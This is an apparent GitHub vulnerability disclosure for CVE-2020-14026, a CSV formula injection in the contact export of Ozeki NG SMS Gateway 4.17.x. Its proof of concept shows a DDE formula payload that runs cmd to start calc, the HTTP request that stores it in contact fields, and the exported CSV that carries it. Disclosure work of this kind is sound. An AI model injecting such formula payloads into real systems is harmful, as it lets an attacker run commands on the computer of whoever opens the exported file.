Skip to content
master
Switch branches/tags

Name already in use

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?
Disclosures/CVE-2020-14026-Formula Injection-Ozeki SMS Gateway/
Disclosures/CVE-2020-14026-Formula Injection-Ozeki SMS Gateway/

Latest commit

 

Git stats

Files

Permalink
Failed to load latest commit information.
Type
Name
Latest commit message
Commit time
 
 
 
 

CVE-2020-14026: Ozeki SMS Gateway Formula Injection

CSV Injection (aka Excel Macro Injection or Formula Injection) exists in the "Export Contacts" feature in Ozeki NG SMS Gateway 4.17.1 through 4.17.6 via a value that is mishandled in a CSV export.
By leveraging this vulnerability, if a victim opens the affected spreadsheet files and ignores the security warnings, it will allow an attacker to run commands on the victim computer on behalf of the user who opened the downloaded CSV file.

Proof Of Concept:

It was possible to inject the following payload into the fields of "New Contact" form:

=cmd|' /C calc.exe!'A1'

The following request shows an example of the stored payload:

POST /default HTTP/1.1
Host: <IP>:9443
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3835.0 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Content-Length: 294
Cookie: usrckenc=4ef***TRUNCATED***712
 
mode=addcontact&layout=MENUVIEW&MENU=COMPOSEMENU2&MAIN=COMPOSE&OZFORM_CONTACTCOMMENT=%3dcmd|'+/C+calc.exe'!'A1'&OZFORM_CONTACTOTHER=&OZFORM_CONTACTIM=&OZFORM_CONTACTEMAIL=&OZFORM_CONTACTFAX=&OZFORM_CONTACTTEL=&OZFORM_CONTACTMOBILE=&OZFORM_CONTACTNAME=%3dcmd|'+/C+calc.exe'!'A1'&OZFORM_BUTTON=OK

After the victim user used the affected functionality, the generated file contained the following data:

Name; Mobile; Telephone; Fax; Email; Im; Other; Comment; Group
=cmd|' /C calc.exe'!'A1'; ; ; ; ; ; ; =cmd|' /C calc.exe'!'A1'; 

Request to export the address book in CSV Format:

GET /admin_addressbook_all_contacts.csv?layout=EMPTY&MAIN=ADDRESSBOOKMENU&user=admin&selectedgroup=All+contacts&format=csv HTTP/1.1
Host: <IP>:9443
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3835.0 Safari/537.36 
Cookie: usrckenc=4ef***TRUNCATED***712

Response:

HTTP/1.1 200 OK
Content-Length: 130
Content-Type: text/csv; charset=utf-8
Last-Modified: Tue, 09 Jun 2020 13:28:59 GMT
Server: OzekiNG/4.17.1 Microsoft-HTTPAPI/2.0
Date: Tue, 09 Jun 2020 10:28:59 GMT

Name; Mobile; Telephone; Fax; Email; Im; Other; Comment; Group
=cmd|' /C calc.exe'!'A1'; ; ; ; ; ; ; =cmd|' /C calc.exe'!'A1'; 

When the victim opened the file in Microsoft Excel (which is the default application for viewing CSV files in most cases), and ignored the security alerts, the attacker's code was executed in the operating system of the victim user (e.g. the built-in calculator application started):